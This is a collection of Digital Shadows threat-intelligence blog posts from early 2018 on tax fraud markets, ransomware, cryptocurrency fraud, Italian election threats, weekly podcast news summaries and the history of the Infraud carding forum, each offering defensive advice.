Establishing a ransomware playbook can help preparation for an eventual attack. The playbook can be used to define specific roles and functions should the unwanted occur, allowing organizations to establish tactics for managing a ransomware infection, as well as strategies for dealing with the aftermath. An effective ransomware playbook:

  • Requires a whole-of-business approach to planning. Ransomware affects multiple business areas and may result in large scale service disruption
  • Plans responses to extortion demands and identifies “worst case” scenarios
  • Shows an understanding of your playing field and adversaries. Threat intelligence can help to inform approaches to ransomware attacks

For more insight into the ransomware ecosystem, join our live webinar on “Emerging Ransomware Threats and How to Protect Your Data” being held on 15 March 2018. Hear from Digital Shadows’ analysts and the FBI Cyber Division’s leading ransomware investigator about the latest threats and vectors, as well as best practices for protecting you and your organization.

Pressing For Progress This International Women’s Day Thu, 08 Mar 2018 06:27:19 +0000 “Do you think you’re going to be able to handle working with all these men?”

One of the few questions over the course of my career that momentarily stunned me during the interview process, this happened over 20 years ago when I was interviewing for a more technical role in my current company at that time. I say stunned because the question had never occurred to me and this is in spite of growing up during a time when I knew I could be an astronaut (thank you Sally Ride!), but had resigned myself to the fact that “girls can’t be President”.  It sounds ridiculous now to type it, but these were the facts of my life growing up in the southern part of the US, in a very conservative, church-going family and long before the Internet was a thing.

As I ponder our upcoming International Women’s Day and think about the path my own life has taken, I am truly both in awe of how far we’ve come and simultaneously, how far we have yet to go. It has only been in the last few years that I’ve realized a lot of my behaviors have been influenced by unconscious bias, from my parents, teachers, friends, peers and colleagues so I am encouraged to see the dialogue continuing today through the various movements around the world.  

This year’s IWD theme is “Time is Now: Rural and urban activists transforming women’s lives”. I have long looked up to the many amazing and inspiring activists who tackle these challenges on a daily basis. I also think many others are hesitant to call themselves “activist” for fear of reprisal or challenge and I throw my own hat into that ring – I’ve never thought of myself as an activist, despite leading my university’s chapter of N.O.W., marching in “Take back the night” rallies and turning down opportunities for IT employment that had “females must wear dresses” requirements (yes, this really happened). What I’ve learned over the years is that it is less important about what you call yourself – just as our actions shape our destiny, so too do they describe our aspirations and capabilities. For all my male and female friends and colleagues who are nervous about taking up the title activist or feminist, I challenge you to simply “do”. Call out the derogatory jokes when you hear them, challenge your peers to leave discrimination behind them, and turn an eye to your own unconscious bias.

Lastly, in light of the recent RSA keynote conversation and ongoing challenges around having enough women in the cyber security industry, if I could turn the clock back and tell my younger self anything, it would be to build the technical capability, competency and confidence that goes along with that, but also to be open to taking leaps of faith. It took me a long time to realize I could apply for the next challenge or next role without being 110% qualified.

As for that interview question?  My response: “I hope they can handle working with me!” I’m happy to report I got the job.


Interested in reading more on Women in Security? Read my colleague’s blog post, Women in Security: Where We Are And Where We Need To Go.

It’s Accrual World: Tax Return Fraud in 2018 Wed, 07 Mar 2018 17:15:17 +0000 With just over a month until Tax Deadline Day, individuals are scrambling to get their tax returns submitted. This is a proven time of the year for cybercrime, and 2018 has been no exception. The Internal Revenue Service has already outlined new scams targeting consumers this year. Criminals have once again used tax themes as lures to spread malware, as was the case with the Rapid Ransomware campaign.

Tax Fraud in 2018

Tax fraud endures despite countermeasures and increased awareness of the threat. This is largely due to the extent of personally identifiable information (PII) available online. Social Security Numbers (SSNs) are widely advertised and can be purchased for as little as $1; Figure 1 shows a criminal site selling 4,210,341 SSNs, which also include associated names, physical addresses and dates of birth.

Figure 1: Social Security Numbers for sale on cvv[.]me


The Equifax breach in 2017 led to the theft of PII belonging to at least 145 million individuals. Recent revelations suggest that that attackers may have also stolen tax identification numbers, additional driver’s license and credit card details. While it is not clear whether the breach had been conducted by cybercriminals or a nation-state, this data – should it eventually find its way into the criminal market – would provide a wealth of opportunities for tax fraudsters.

Acquiring Tax Information

Tax information – such as W2, 1040 and 1099 forms, as well as company accounts – is valuable data for cybercriminals. This information can be obtained through network intrusions, phishing, and Business Email Compromise. The latter technique typically works by impersonating an employee within the organization. In this tax version of the scam, the victim is asked to transfer tax documents instead of wiring funds. With this data, criminals can then commit fraud or resell the data.

Attackers can also acquire this information through scampages. Tax filing companies are particular targets of these phishing attempts. A recent example of this is turbotax-myintuit[.]com, an imitation of the legitimate turbotax[.]intuit[.]com. While the site is not yet hosting content, it has the potential to be used in phishing campaigns.

At this time of year, fraudsters take to forums requesting help with getting tax information for their scams; meanwhile, more technically capable actors look to profit by providing their services and expertise. In Figure 2, a criminal forum user asks for help in obtaining the relevant documents needed to submit their fraudulent tax return, while in Figure 3 a seller openly advertises their “Hacking Services”, which includes the ability to procure W2 forms.

Figure 2: User on Hack Forums looking to buy W2 and 1040 tax forms (screenshot taken on February 27, 2018)


Figure 3: Seller on Offensive Community forum advertising hacking services


Purchasing Information Online

For a little as $40-50, criminals can bypass these procedures altogether and buy these documents on criminal forums and marketplaces. These include stolen, pre-filled and forged forms (Figure 4), as well as specialist guides for conducting tax return fraud (Figure 5).

Figure 4: Forged W2 form advertised for $52 on Dream Market


Figure 5: Tax return fraud cashout guide for sale on Wall Street marketplace


Social Security Numbers are ubiquitous across dark and deep web marketplaces and criminal shops. In some instances, as seen in Figures 6 and 7, vendors will offer packages that have a range of data on individuals. This can be partial PII or “fullz”, a term that means a combination of financial and personal information. The latter is more valuable for threat actors, but partial of PII can also be used to commit a range of identity frauds, including falsified tax returns.

Figure 6: W2 and SSN information for sale on Wall Street, a darkweb marketplace


Figure 7: “Full profiles” advertised on Dream Market, a dark web marketplace. The posting includes W2 forms, pay-stubs and Social Security Numbers


Of course, there are security measures that make tax fraud more difficult for criminals, such as the IP PIN that is issued to many taxpayers by the IRS. Despite the IRS being vulnerable to compromise in previous years, the system is now more resilient to exposing that information to fraudsters (there is no longer a web interface for forgotten PINs with easy-to-answer questions, for example).

Capitalizing on Dediks

Fraudsters can target the accounts of tax filing companies without the need for phishing or scam pages. In Figure 8, one forum user seeks partners that have control of computers with these pieces of software installed. The term “Dedik” is an abbreviation of “dedicated”, which is used to describe a computer under remote control of a hacker. With control of users’ computers that have this software, malicious actor can capture keystrokes and ultimately gain access to the user accounts.

Figure 8: Actor on a Russian-speaking forum seeking individuals with access to computers that have tax preparation software present (screenshot taken on February 27, 2018)


Staying Safe Online

With actors looking to monetize the vast amount of PII available online during tax season, consumers, organizations and tax filing companies should be extra-vigilant about fraudulent activity. Here are some tips:

  1. Consumers should submit an Identity Theft Affidavit if you have been the victim of identity theft.
  2. IRS provides some great resources for understanding the latest techniques used by attackers, which you can access here, or by following @irstaxpros on Twitter.
  3. Organizations should consider that BEC can be for information as well as to wire funds. Update your security awareness training content to include the BEC scenario. This should be included in new hire training, but you should conduct ad hoc training for this scenario now.
  4. Tax filing companies should monitor for spoofed domains. DNS Twist is a good, free resource to do so.

Subscribe to our weekly newsletter to get the latest news and research by Digital Shadows.

Shadow Talk Update – 03.05.2018 Mon, 05 Mar 2018 16:23:17 +0000 On this week’s Shadow Talk podcast, the Research Team cover CVE-2018-4878 being used in a spam campaign, the HTTPS certificate chaos between Trustico and DigiCert, more ransomware reporting on the SamSam and DataKeeper variants, and the threat of large-scale distributed denial of service (DDoS) attacks using Memcached servers.

Spam enables Flash vulnerability exploit

An Adobe Flash vulnerability tracked as CVE-2018-4878 is being exploited through a spam email campaign. Lure emails contained a shortened link that, if clicked, accessed a Web domain hosting weaponized Microsoft Word documents. If documents were opened, the attack attempted to exploit the vulnerability, enabling remote code execution. CVE-2018-4878 was previously exploited as a zero-day vulnerability in targeted espionage; the spam campaign shows its rapid uptake by other threat actors. Proof of concept exploit code was released publicly, meaning CVE-2018-4878 will likely continue to be targeted by operations using multiple entry vectors, despite a patch being available.


Thousands of website certificates revoked after private key exposure

23,000 Symantec-issued HTTPS website certificates resold by Trustico will be revoked after associated private keys were exposed via email. This may result in website service interruptions unless owners quickly replace certificates. Affected customers were notified, with both DigiCert – the entity responsible for revoking the certificates – and Trustico offering free replacement certs. Although both DigiCert and Trustico are likely to suffer some reputational damage due to conflicting reporting and their public dispute, this is unlikely to impact trust in the certification system.


Update on SamSam ransomware attack

The Colorado Department of Transportation, in the United States, took 2,000-plus staff computers offline after an attack by ransomware “SamSam”. No crucial systems were reportedly affected, and only computers running Windows operating systems were disrupted. The attack vector is not known, but SamSam usually targets vulnerable software applications or servers. The “Gold Lowell” threat group has previously used SamSam and accrued a significant profit from attacks.


New DataKeeper ransomware variant detected

The “DataKeeper” ransomware-as-a-service (RaaS) variant is distinct for its ability to conduct lateral movement. At the time of publication, there had been no transactions into the Bitcoin address associated with this RaaS, indicating that any attempted extortions using the address were ineffective. However, given its accessibility, profit share and capacity for lateral movement, this ransomware will likely be adopted by a variety of actors.


Memcached servers used for DDoS reflection attacks

There is a new DDoS reflection attack method that uses Memcached internet-facing servers. Memcached is a memory caching system that, by default, “listens” on UDP port 11211. More than 90,000 of these servers were discovered on Internet of Things search engine, Shodan, as of 28 February. The code repository site GitHub was targeted by this method, with the peak attack volume recorded at 1.35 terabits per second. Blocking, filtering or modifying Memcached configuration to only listen on localhost is recommended.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

The New Frontier: Forecasting Cryptocurrency Fraud Thu, 01 Mar 2018 16:34:51 +0000 Not a week goes by without a new case of cryptocurrency fraud making headlines. The most recent example concerned the BitGrail exchange, which suffered an attack that resulted in the loss of 17 million Nano Tokens ($170 million). Although BitGrail responded by announcing new security measures – highlighting the need for better security practices by both companies and individuals handling cryptocurrencies – this incident has also been marred by a disagreement between Nano Token and BitGrail over liability. This has sharpened calls for strict regulation of cryptocurrencies and their methods of exchange.

Regulation could have a significant impact on the cryptocurrency space, but we need to remember that even with long-stablished regulatory and law enforcement measures, traditional currencies are still targeted by fraudsters, so we shouldn’t expect cryptocurrencies will be any different.

What we can be sure of is that cybercriminals will continue to find new ways of making money as long as there are enough suitable targets available and the financial reward justifies their time and effort. To better model the future of cryptocurrency fraud, it helps to outline the main drivers and assumptions behind this phenomenon, which we have achieved by using the Cone of Plausibility analytical technique (see Figure 1 below). Our recent paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud, provides an analysis of these drivers. These include:

    1. Accessibility – Advances in technology and the wide availability of tools facilitate this type of fraud. Products such as Crypto Jacker lower the barrier to entry, as explored in our previous blog.


    1. Anonymity – Cryptocurrencies and blockchain technology offer a level of anonymity that, while beneficial in many respects, also embolden fraudsters. Currencies like Monero have better privacy features relative to their older cryptocurrency counterparts, which has in part made it increasingly popular on criminal markets and in money laundering operations. The funds accrued during the June 2017 WannaCry attack, for example, were converted from Bitcoin to Monero, likely because this move would make it easier to anonymously convert into fiat currency.


    1. Popularity and hype – The boom in cryptocurrency investment and development in recent years is one of the strongest drivers for this type of fraud. Criminals will always follow the money, looking to take advantage of whatever is most popular and most lucrative. In the mid-nineteenth century, the promise of gold inspired hundreds of thousands of people to make the journey to California in the hope of striking it rich. The cryptocurrency boom can be seen as a new Gold Rush, with countless individuals rushing to get a piece of the action, heartened by the astronomical rise of Bitcoin, which reached $19,343 in mid-December 2017.


    1. Reputation – Once seen as an esoteric countercultural development favoured by libertarians or criminals, the integration of cryptocurrencies into existing payment systems has given them greater legitimacy. Although not widespread, the roll-out of cryptocurrency-backed prepaid cards and plans for private European banks to provide cryptocurrency services increases the reputation of cryptocurrencies – in turn making them a more attractive prospect to investors. If their reputation increases, they will become more popular, increasing the number of targets for fraudsters.


    1. Opportunity – The sheer number of new altcoins, exchanges and coin offerings means that fraudsters have a wealth of potential targets. With over 1,442 cryptocurrencies in circulation, and new alternative coins – “altcoins” – emerging every week, the opportunities for cybercriminals to defraud cryptocurrency enthusiasts only increases. Our previous blog focused on the ways criminals were exploiting the interest in Initial Coin Offerings (ICOs) – a way of crowdfunding cryptocurrencies and platforms – through exit scams, spoof ICOs and price manipulation.


    1. Regulation – The success of price manipulation and scam ICOs is aided by a lack of regulation and oversight. In a regulated market such fraud would be illegal, and the threat of law enforcement action would probably deter many, although not all, criminals. Moreover, exchanges and ICO projects would be under more pressure to improve their security practices as they would face serious consequences for facilitating a breach. The BitGrail case, discussed above, is a clear example where a lack of clarity over who bears responsibility for the attack has meant customers have been so far prevented from reclaiming the value of their tokens.

    Despite more concerted efforts of late by U.S. authorities– the Security and Exchange Commission recently filed charges against PlexCorps, which was accused of defrauding investors through a scam ICO – the future of cryptocurrency regulation is also uncertain and should be seen as a panacea for fraud. Criminals will continue to take risks regardless of the potential legal ramifications of being caught. In addition, regulatory implementation will likely be uneven, with some countries such as China and South Korea choosing to ban ICOs completely. While stricter regulation could have a beneficial effect in reducing fraud, it may also deter would-be investors and drive down the value of cryptocurrencies.


    1. Security – As long as organizations and individuals fail to improve their security measures, opportunities for fraud will continue to exist. Weak password practices enable account takeovers, misconfiguring cloud services facilitates cryptojacking, and failure to patch and update effectively means attackers can continue to exploit known vulnerabilities to deliver cryptomining malware.



    Figure 1: Cone of Plausibility used to forecast future of cryptocurrencies

     One of the greatest benefits of this forecasting approach is that it allows us to clearly outline the drivers behind the rise in cryptocurrency fraud, which in turn then allows us to home in on the factors that we as organizations and individuals can influence. While some changes will be harder and time-consuming to implement, there are several measures that organizations, consumers and exchanges can immediately take to mitigate cryptocurrency fraud risks. These include:


    • Authenticating cloud services like AWS to stop fraudsters from stealing your processing power to mine
    • Replacing factory-default credentials with unique and strong passwords to prevent Internet of Things devices from being incorporated into botnets
    • Enforcing strong password security rules across your organizations – this includes enabling multi-factor authentication (MFA)
    • Patching known vulnerabilities being used to deliver crypto miners. Vulnerabilities in Apache Struts (CVE-2017-5638) and DotNetNuke (CVE-2017-9822) servers have been used to download Monero miners. These miners have also been delivered by exploiting patched vulnerabilities in the popular Apache CouchDB open source database (CVE-2017-12635 and CVE-2017-12636)
    • Having a reputable adblocker in place: the NoCoin browser extension was also developed to block coin miners like Coinhive
    • Checking phishing databases and more specialist cryptocurrency fraud sites such as the Ethereum Scam Database before using any sites that you are unfamiliar with


    Despite their volatility, high valuations, looming regulation measures and the projected adoption of cryptocurrency in both online and physical transactions, cryptocurrency fraud will not go away any time soon. However, greater education about cryptocurrencies and the risks associated with them for consumers and organizations can go a long way to fighting this trend. Digital Shadows will continue to watch this evolving space, providing research and advice that can help users navigate the Wild West that is the cryptocurrency world.

    To learn about other tactics, including account takeover and crypto jacking, download a copy of our research paper, The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud.

    Protecting Your Brand: Return on Investment Tue, 27 Feb 2018 16:29:23 +0000 Last week I was joined by Brett Millar, Director of Global Brand Protection for Fitbit, for a webinar on “Protecting Brands from Digital Risks and the Dark Web”. It was great to hear how Brett works with different business functions to address different risks to the Fitbit brand. Most of all, I loved hearing about the different ways in which Brand Managers can demonstrate a return on investment (ROI).


    Brand Protection

    For organizations looking to safeguard their brands online, there are lots of online sources where this occurs. Within the webinar I spoke about the threats to brands that exist on the dark web -specifically on account takeover and counterfeit goods. Dark web marketplaces, such as Dream Market shown below, have whole sections dedicated the sale of counterfeit goods. Of course, there is a lot more to brand protection than dark web activity. Organizations need to be monitoring a wide range of sources to adequately protect their brands online. (Check out a blog from our CMO, Dan Lowden, on some specific instances of brand exposure that we’ve seen involving spoof domains, fake mobile applications, and fake social media profiles.)


    Figure 1: A dedicated counterfeit category on the Dream Market, with over 2,800 goods for sale


    Affecting the Bottom Line

    ROI (Return on Investment) is common term in security, but effectively demonstrating it is difficult. One reason for this is that ROI is a calculation usually expressed numerically or as a percentage. The impact of your security investment, however, does not always lend itself to quantifiable metrics. It is always trickier trying to show how events that have not happened, like cyber attacks that have been averted, impact a company’s net earnings or bottom line.

    The concept of ROI is just as critical for brand protection; Brand Managers need to be able to show they are impacting the bottom line. The good news is that the result of your brand protection strategy is measurable, and there are three main ways to do just that.

    1. Direct revenue return. This is the most clear-cut way of demonstrating ROI. Investigations launched by an organization’s fraud team in counterfeit sites can lead to proceeds flowing back into the company. This typically occurs through settlements, judgement amounts, and restitution amounts. This approach is pretty easy to quantify.
    2. Loss prevention. This is a different side of the same coin as direct revenue return. Stopping an activity that was costing the company $X million per year prevents this loss from reoccurring.
    3. Indirect revenue. If an increase in revenue for a particular product coincides with an increased effort to remove counterfeits of that product on gray and black markets, it can be inferred that there may have been some sort of causation. This is harder to quantify but it can, nonetheless, be valuable.

    These metrics can be supplemented with other metrics, such as tracking the number of:

    • Cease and Desist letters sent
    • Audits performed
    • Sites taken down
    • Custom site seizures

    With so many areas of security to focus on, demonstrating a return on investment is a constant challenge. However, the intersection of brand management and security offers a real opportunity to demonstrate the economic value of protecting your brand online.

    Watch the webinar on “Protecting Brands from Digital Risks and the Dark Web” to find out more about other types of brand exposure and ways organizations can manage this risk.

    Shadow Talk Update – 02.26.2018 Mon, 26 Feb 2018 15:51:21 +0000 In this week’s podcast, the Digital Shadows Research Team discuss attacks against banks using the SWIFT network, business email compromise (BEC) threats, the state of ransomware, as well as new activity by thedarkoverlord and APT-37.



    Two new thefts using SWIFT network confirmed

    Over the past week, an unidentified Russian bank and India’s City Union Bank confirmed that recent fraudulent SWIFT banking transfer requests had been submitted, attempting to steal $8 million. Specifics of malware deployment, and the perpetrators’ tactics, techniques and procedures (TTPs), are among the many unknown details. Previous SWIFT attacks have been attributed to “Lazarus Group”, although several financially motivated actors have likely made similar theft attempts. Targeting this transfer system remains profitable, and further theft attempts are likely.


    Business email compromise campaign targets Fortune 500 companies

    Fortune 500 companies—ranked among the highest-revenue companies in the United States – have been subject to an ongoing BEC campaign. Targets operated in the retail, healthcare, financial and professional services sectors. Campaign operators have allegedly stolen “millions of dollars” using spearphishing, as well as advanced social engineering techniques; no malware was involved.


    Extortion actor thedarkoverlord publicizes new targets

    The threat actor thedarkoverlord has returned after a three-month hiatus. Recent Twitter activity suggests targeting of a US public school union, a US law firm, and un-specified Hollywood companies. Thedarkoverlord has previously conducted a number of extortion campaigns, largely against the United States healthcare sector. Digital Shadows cannot establish the veracity of these new claims, but it is likely that thedarkoverlord is attempting to gain new publicity by threatening high-profile targets.


    Ransomware remains a threat to organizations in all industries

    The “Saturn” ransomware-as-a-service (RaaS) variant has been active in February. Saturn RaaS does not require a sign-up fee, instead, developers request 30% of extortion fees generated from each successful infection. In other ransomware news, the Colorado Department of Transportation (CDOT) was affected by a SamSam ransomware infection on 21 February 2018. This infection reportedly caused disruption to 2,000 computers owned by CDOT; however, CDOT stated it will not pay the ransom and is using system backups.


    North Korea-linked espionage group APT-37 continues to evolve

    Cyber security company FireEye reported the continued activity and evolution of “APT-37” (aka Reaper), an allegedly North Korea-linked threat group motivated by information theft and espionage. FireEye’s research also linked APT-37 activity to that reported for other threat actors, including “Group 123” and “ScarCruft”, although exact details were unclear. APT-37 has mainly targeted the technology and healthcare sectors in South Korea, but has also implicated Japan, Vietnam and the Middle East. APT-37 will likely continue their information-gathering campaigns for the short- to mid-term future (one to six months) and more information about the group may arise during that time.

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Threats to the Upcoming Italian Elections Thu, 22 Feb 2018 17:08:26 +0000 On 5 March Italian citizens will vanno alle urne to vote in a general election, following the dissolution of the Italian Parliament by President Sergio Mattarella on 28 December 2017. Italy has been led by a caretaker government under the leadership of Democratic Party (PD) foreign minister Paolo Gentiloni since the resignation of former Prime Minister Matteo Renzi. Renzi stepped down following the loss of a referendum on constitutional reforms in December 2016.

    This March will see the use of a new electoral system, one designed to favor coalitions by requiring the governing party to gain over 40% of the vote, thus making it harder for a single party to win a majority in Italy’s notoriously divided parliament. No party has yet polled above 40%, with a centre-right alliance formed by Silvio Berlusconi currently polling at approximately 35%.

    Under the growing cloud cast by reports of network intrusions against political parties during the 2016 United States presidential election, as well as claims of a Kremlin-backed influence campaign in favour of the Front National in the French elections, political events are coming under more and more scrutiny for nefarious activity. In this blog we will assess the confirmed examples of cyber attacks that we have observed, and look back at activity seen during previous elections to forecast the type of activity we can expect. This includes hacktivism, network intrusions, data leaks and disinformation.


    1. Hacktivism

    Hacktivist actors are most often motivated by public attention, either for themselves, or the issues they claim to represent. Hacktivist attacks generally take the form of denial of service (DoS) attempts, website defacements, and the curation of open source data to appear like a data leak. The Anonymous collective has had an ongoing #OpItaly campaign since January 2017, when Italian law enforcement arrested two individuals charged with cyber espionage against politicians, public institutions, and commercial entities. The activities of the group have not yet targeted political parties, but may use the publicity surrounding the elections as a platform to gain public attention.

    Further factions of the collective, such as the Italian hacktivist group AnonPlus, have specifically targeted the elections, releasing personally identifiable information of regional PD members and defacing PD websites. However, their impact so far has been limited, and is unlikely to have any lasting impact on the elections themselves: the ‘leaked’ was already available on open sources, and their websites defacements did not cause any persistent disruption.

    More sophisticated threat actors have targeted the Rousseau platform used by far-right party Movimento5Stelle (M5S). #Hack5Stelle is a campaign focused on leaking names, passwords, and datasets associated to the platform, and motivated by both financial and political motives.


    Figure 1: Twitter account offering allegedly hacked Movimento5Stelle database for sale


    Figure 2: Landing page for the Rousseau platform


    2. Network Intrusions

    Actors may seek to target political parties or government organizations in order to exfiltrate sensitive data for use in political campaigns. Given alleged Russian involvement in the network intrusions against the Democratic party in the US, and the signing of a collaboration agreement between far-right party Lega Nord and Vladimir Putin’s United Russia party, it is plausible that a similar threat may be present during the Italian elections. Fraught current relations between Russia, NATO, and the EU, combined with the Lega Nord’s anti-EU platform means that the Italian elections are likely to present a target for Russian espionage campaigns. Furthermore, large financial institutions may be targeted given the focus on the economy and currency in this year’s election.

    Social engineering and spear phishing remain the most successful attack vectors for network intrusions, and this is unlikely to change for the Italian elections.


    3. Data leaks

    While a number of activist groups have leaked open source databases of local political parties, a more sophisticated threat actor could release sensitive or confidential information in order to bias political opinion. Such information can be obtained in a number of ways and be used by a variety of threat actors, including both ideologically motivated individuals and nation state groups. Phishing and social engineering attempts, network intrusions, and document theft from insiders are all ways in which threat actors may seek to obtain such data. We detected no data leak campaigns relating to the Italian elections at the time of writing.


    4. Disinformation

    False media reporting, also known as the fake news phenomenon, is being increasingly used by threat actors to sway or alter public political opinion. Such activity uses a wide variety of platforms, including legitimate or spoof social media accounts such as Facebook and Twitter, and interweaves both legitimate and exaggerated or false reporting. During the French elections, we observed a claim of plagiarism, as a spoofed websites of legitimate Belgian newspaper LeSoir published articles alleging that Saudi Arabia was financing Emmanuel Macron’s campaign. We outlined the easy availability of such tools in our previous report, The Business of Disinformation.

    Although no legitimate newspapers have claimed plagiarism during the Italian elections, a number of Twitter accounts related to Wikileaks Italy (@Wikileaks_Ita – to which the main Wikileaks account has denied any official association), have been tweeting news relating to the current Eni bribery investigations. The account uses a combination of real news reports and rumours to allege former Prime Minister Renzi’s involvement with criminal activities. Although Renzi is not standing in this election, such an allegation has a reputational impact for the PD, Renzi’s party.


    Figure 3: Twitter account impersonating WikiLeaks used to spread articles on corruption investigations


    Furthermore, fake accounts on Twitter and Facebook used in the referendum campaign in 2016 have been reanimated in support of Matteo Salvini, leader of the Lega Nord. A number of automated accounts have been linked to the party’s official Twitter feed, @LegaSalvini. Although these bots have not been used to publicize fake news, they have been used to bias or promote political opinions by artificially inflating the support and publicity accorded to Salvini.



    Figure 4: Examples of Twitter bots all used to publish the same posts in support of Matteo Salvini


    E allora?

    Despite ongoing concern surrounding elections, it is unlikely that outside threat actors will seek to interfere in an already chaotic process. Unlike elections in France and Germany in 2017, the Italian electoral process is much more obscure, and the proliferation of smaller parties makes it difficult to definitively outline where an influence campaign could add value. Similarly, it is difficult to understand which party any external threat actor would seek to influence, as none are likely to gain a clear lead, and all have made varying conflicting and public statements about the parties with whom they would be willing to cooperate.

    The most likely threat comes from internal hacktivist campaigns: in addition to defacement attacks, groups may seek to conduct DDoS attacks against election infrastructure or to deface official websites, hindering the voting process.

    While the scenarios above remain unclear, organizations can help protect themselves against many of the techniques and threats described above. Mitigation measures include:

    • Providing adequate training for staff regarding the threat from spear phishing and social engineering attacks. This will mitigate against the most likely, but not the only, attack vectors for network intrusion and public data leaks.
    • Properly securing public facing applications and tracking activist campaigns.
    • Enforcing strong password security practices to reduce the likelihood of account takeovers.
    • Remaining skeptical about reported statistics and stories.

    Subscribe to our weekly newsletter to get the threat intelligence and research by Digital Shadows.

    Prioritize to Avoid Security Nihilism Tue, 20 Feb 2018 15:41:56 +0000 In many situations associated with cyber security, in particular defending an organization, it is easy to get overwhelmed with not only the sheer number of issues but also the complexity of the interconnections between them. Technical issues are inextricably linked with social, cultural and political issues. Confronted with this sea of obstacles, it’s easy to succumb to security nihilism: “nothing is ever good enough”, “offense always wins” or “security is a losing battle”. As a defender, it is crushing to see how even an average Red Team can rip apart your defences, another successful engagement for Team Red as your passwords tumble helplessly out of the Domain Controller!

    It’s a truism, if not a platitude, that “perfect is the enemy of good”, but I believe that this phrase takes on a new meaning in the world of cyber security. The answer to security nihilism is the art and science of prioritization. Since defenders cannot protect everything to an equal standard, trade-offs have to be made. Difficult decisions must be taken. But where to start? I would argue that the best place to start is with the reality of protecting your organization. By which I mean, a pragmatic focus on:

    1. The critical assets that your organization has
    2. The credible threats to those assets

    Threat modelling exercises are useful heuristics for roughly figuring out the critical assets and the credible threats. An organization that handles payment card data will have a different set of assets and threats compared to another organization that handles sensitive government data to another organization that may regularly store Protected Health Information (PHI). An organization’s security posture should be appropriate for the types of threats that they realistically face.

    In order for these threat modeling exercises, which are often table-top exercises, to have meaning, they must be grounded in reality. Not all threats that organizations face wield NSA-grade 0days. Not all organizations are routinely attacked by APT groups. But understanding how attackers you are facing actually operate is essential. As The Grugq is fond of saying, “increase attacker costs!”. As defenders, we need to understand what tasks are costly for attackers and how to make those tasks even more expensive.

    Let’s see how standard TTPs (tactics, techniques, and procedures) used by a wide-variety of different threat actors can be made more expensive. We’ll start with a phishing campaign:



    Outside in, network-based attacks are also widely-used:



    Most organizations have key employees who are high-value targets for attackers and most organizations have externally facing systems, in particular Web applications. These assets are a good place to start. By understanding how attackers operate, we can establish some priorities about which actions as defenders we should take based upon the assets that we have and our knowledge of how attackers operate. As our capability matures, our assets can become more specific and nuanced and our understanding of attacker tradecraft similarly develops. Robust fundamentals, however, never go out of style!


    To get the latest threat intelligence news and research, subscribe to our email list here.

    Shadow Talk Update – 02.19.2018 Mon, 19 Feb 2018 21:42:21 +0000 In this week’s Shadow Talk podcast, the Digital Shadows Research Team analyses new activity from the Lazarus Group, attacks on the Winter Games opening ceremony, the theft of $170 million from the Bitgrail cryptocurrency exchange, and two Outlook vulnerabilities.


    Lazarus Group continues to pursue theft and espionage 

    New Lazarus Group activity reported this week shows that the threat group remains highly active and motivated by financial and information theft, as well as espionage. The group was attributed with the financially motivated HaoBao campaign, targeting Bitcoin users, and the development of two trojan variants, “HardRain” and “BadCall”. The targeting of cryptocurrency marks a relatively recent evolution in Lazarus Group’s tactics, techniques and procedures (TTPs). The trojan malware indicates the group’s sustained interest in espionage tools. Digital Shadows expects the group to continue to target cryptocurrency trading platforms within the next one to six months.


    Winter Olympics ‘targeted with Olympic Destroyer’ malware 

    Cyber security researchers have identified a sample of what they assess to be the malware used during the opening ceremony of the 2018 Olympic Winter Games. The malware attacks suspended Wi-Fi in the stadium and press center. Despite having limited effects, the malware appears technically complex with varied techniques, including hardcoded credentials within its source code to allow lateral system movement. Competing and conflicting reports have linked the campaign to North Korea, China and/or Russia, but there has been insufficient evidence to definitively implicate any threat actor.


    BitGrail reports USD 170 million cryptocurrency loss

    The BitGrail cryptocurrency exchange suffered an attack in which 17 million Nano Tokens (USD 170 million) were allegedly lost. Prior to the disclosure of the attack, BitGrail suspended all withdrawals and deposits of several cryptocurrencies and announced new security measures. Subsequently, a series of heated disagreements have sprung up between the creators of Nano Token and the BitGrail exchange, with neither accepting responsibility for the loss, and both accusing the other of suspicious behavior. Such disagreements will likely prevent customers from reclaiming the value of their tokens. The fallout from the attack will likely strengthen the call to regulate cryptocurrencies and their methods of exchange.


    RCE vulnerability affects MS Outlook

    Microsoft (MS) has released descriptions of two vulnerabilities affecting its Outlook software. One is CVE-2018-0852, a memory corruption vulnerability allowing arbitrary remote code execution (RCE) if users access a crafted malicious file. The second is CVE-2018-0850, a privilege escalation vulnerability. Although neither has been detected as being exploited in the wild, both affect multiple version of MS Outlook; given their ubiquity, it is likely that criminals will seek to exploit them.

    Listen to the full podcast here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

    Infraud Forum Indictment and Arrests: What it Means Thu, 15 Feb 2018 17:44:48 +0000 On 07 February 2018, the U.S. Department of Justice unveiled an indictment from 31 October 2017 against 36 individuals associated with the Infraud Forum, a cybercriminal forum specializing in payment card fraud. This was a result of an operation known as “Shadow Web” and claimed to make “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.” The members of the forum are alleged to have caused over $500million in actual losses.

    In the context of last year’s seizure of AlphaBay and Hansa dark web marketplaces, what does this mean for the evolution of the criminal ecosystem, and what is the potential impact on organizations?

    Figure 1: A screenshot of infraud[.]wf, one of the latest editions of the Infraud Forum. Screenshot taken on 7 February 2018.


    Humble beginnings

    The Infraud forum has been through many incarnations, and there are several domains still carrying the Infraud name. The term “infraud”, however, first appeared on a WordPress blog known as the “infraud underground carders blog”. The earliest post on this site is dated 31 October 2010. These initial posts mainly provided advice on carding and ATM fraud, as well as reposts of news articles on criminal and fraudulent activity.

    The first reference on this blog to a dedicated Infraud site appeared on 11 November 2010, when a post was added offering downloads for a ZeuS crimeware toolkit. The post contained a url link to a thread on infraud[.]ws.

    On 24 November 2010, a new post was added to the site claiming that the name of the group behind the blog had changed to “Ministry of Fraudulently Affairs”.


    Figure 2: Screenshot of Infraud underground carders blog


    A post added on 07 December 2010 claimed that the infraud[.]ws domain had been blocked as it was reported to host malware and fraudulent content. The next day, the Infraud domain had changed to from infraud[.]ws to infraud[.]su.

    As of 03 March 2011, the blog advised users to only visit hxxps://infraud[.]cc.


    Figure 3: Post made on Infraud blog advising users to visit infraud[.]cc, a domain registered on 30 November 2010


    The name Ministry of Fraudulently Affairs also appears on a separate LiveJournal blog site (hxxp://infraud.livejournal[.]com) where advertisements and links to the infraud[.]cc site were posted.

